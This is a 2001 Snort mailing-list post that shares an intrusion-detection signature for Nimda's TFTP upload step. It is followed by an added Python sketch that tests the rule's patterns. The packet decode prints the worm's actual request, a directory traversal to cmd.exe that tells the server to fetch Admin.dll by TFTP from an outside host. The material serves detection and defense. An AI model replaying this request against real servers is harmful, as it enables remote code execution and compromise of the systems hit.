Snort mailing list archives

Signature for NIMDA command


From: Steve Halligan <agent33 () geeksquad com>
Date: Wed, 19 Sep 2001 17:49:14 -0500

This is the signature to detect a Nimda-infected server telling a server
that it has determined is vulnerable to use tftp to upload the admin.dll
file.  If you see this one trip, you have been gotten.

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"Successful NIMDA TFTP activity"; flags:A+; uricontent:"cmd.exe?"; nocase; uricontent:"c+tftp -i"; nocase; classtype:successful-admin;)

Here is the packet decode that I based the rule on.

-steve

------------------------------------------------------------------------------
#(2 - 25210) [2001-09-18 10:17:15]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> 65.29.59.70
      hlen=5 TOS=0 dlen=191 ID=44180 flags=0 offset=0 TTL=119 chksum=42351
TCP:  port=3905 -> dport: 80  flags=***AP*** seq=461005741
      ack=288345 off=5 res=0 win=8760 urp=0 chksum=246
Payload:  length = 139

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74   m32/cmd.exe?/c+t
030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33   ftp -i 65.29.243
040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64   .180 GET Admin.d
050 : 6C 6C 20 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20   ll c:\Admin.dll 
060 : 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 48 54 54 50   :\Admin.dll HTTP
070 : 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D   /1.0..Host: www.
080 : 0A 43 6F 6E 6E 6E 65 63 74 69 6F                  .Connnectio
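As an added illustration (not part of the original post or of Snort), the following Python applies the rule's two uricontent checks to the request from the hex dump above and to two constructed requests; the request line is transcribed from the dump, the trailing headers and the benign request are assumptions. It also shows why a nocase modifier is needed after each uricontent, since in Snort it binds only to the immediately preceding pattern.

```python
# Constructed samples. The request line of NIMDA_REQUEST is transcribed from
# the hex dump above; the headers after it are filled in as an assumption.
NIMDA_REQUEST = (
    "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp -i 65.29.243.180 "
    "GET Admin.dll c:\\Admin.dll :\\Admin.dll HTTP/1.0\r\n"
    "Host: www\r\nConnection: Keep-Alive\r\n\r\n"
)
# Same request with the case changed, to show what nocase buys.
UPPERCASE_REQUEST = NIMDA_REQUEST.replace("cmd.exe?", "CMD.EXE?").replace("tftp", "TFTP")
# Harmless constructed request that mentions tftp but never reaches cmd.exe.
BENIGN_REQUEST = "GET /scripts/search.cgi?q=tftp+-i+howto HTTP/1.0\r\nHost: www\r\n\r\n"

# The two uricontent patterns of the rule.
URICONTENT = ("cmd.exe?", "c+tftp -i")


def request_uri(payload: str) -> str:
    """Return the URI portion of an HTTP request line.

    The Nimda request line carries spaces inside the URI (the tftp command),
    so a strict split on whitespace would truncate it; instead take everything
    between the method and the trailing HTTP-version token.
    """
    line = payload.split("\r\n", 1)[0]
    parts = line.split(" ")
    if len(parts) < 2:
        return ""
    if parts[-1].startswith("HTTP/"):
        return " ".join(parts[1:-1])
    return " ".join(parts[1:])


def matches_rule(payload: str, nocase_all: bool = True) -> bool:
    """Apply the rule's uricontent checks to a request payload.

    With nocase_all=False, case-insensitivity applies only to the second
    pattern, which is how a rule with a single trailing nocase behaves,
    because a Snort nocase modifier binds to the preceding content only.
    """
    uri = request_uri(payload)
    checks = []
    for i, pat in enumerate(URICONTENT):
        ci = nocase_all or i == len(URICONTENT) - 1
        checks.append(pat.lower() in uri.lower() if ci else pat in uri)
    return all(checks)
```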
